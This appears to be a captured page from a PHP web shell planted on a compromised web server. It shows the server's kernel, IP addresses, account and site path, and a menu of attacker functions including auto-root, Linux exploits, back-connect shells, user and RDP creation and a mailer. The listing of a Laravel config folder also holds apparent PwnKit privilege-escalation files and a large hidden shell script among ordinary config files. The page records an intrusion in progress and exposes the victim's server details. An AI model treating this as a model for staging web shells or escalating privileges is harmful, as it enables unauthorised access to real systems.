Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.20
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo16.com /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
.htaccess
127
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
app.php
9.38
KB
-rw-r--r--
auth.php
3.71
KB
-rw-r--r--
broadcasting.php
1.56
KB
-rw-r--r--
cache.php
2.99
KB
-rw-r--r--
database.php
4.94
KB
-rw-r--r--
datatables.php
3.94
KB
-rw-r--r--
date_format_conversion.php
216
B
-rw-r--r--
dompdf.php
10.14
KB
-rw-r--r--
filesystems.php
2.07
KB
-rw-r--r--
goat1.php
143.87
KB
-rw-r--r--
hashing.php
1.53
KB
-rw-r--r--
logging.php
2.83
KB
-rw-r--r--
mail.php
4.57
KB
-rw-r--r--
payment_gateway.php
1.3
KB
-rw-r--r--
permission.php
4.48
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
queue.php
2.65
KB
-rw-r--r--
services.php
950
B
-rw-r--r--
session.php
6.87
KB
-rw-r--r--
tagging.php
1.01
KB
-rw-r--r--
translation.php
2.22
KB
-rw-r--r--
variable.php
127
B
-rw-r--r--
view.php
1.03
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tagging.php
<?php return [ // Datatype for primary keys of your models. // used in migrations only 'primary_keys_type' => 'integer', // 'string' or 'integer' // Value of are passed through this before save of tags 'normalizer' => '\Conner\Tagging\TaggingUtility::slug', // Display value of tags are passed through (for front end display) 'displayer' => '\Illuminate\Support\Str::title', // Database connection for Conner\Taggable\Tag model to use // 'connection' => 'mysql', // When deleting a model, remove all the tags first 'untag_on_delete' => true, // Auto-delete unused tags from the 'tags' database table (when they are used zero times) 'delete_unused_tags' => false, // Model to use to store the tags in the database 'tag_model'=>'\Conner\Tagging\Model\Tag', // Delimiter used within tags 'delimiter' => '-', 'tag_model' => '\Conner\Tagging\Model\Tag', 'tagged_model' => '\Conner\Tagging\Model\Tagged', 'tag_group_model' => '\Conner\Tagging\Model\TagGroup', ];
Close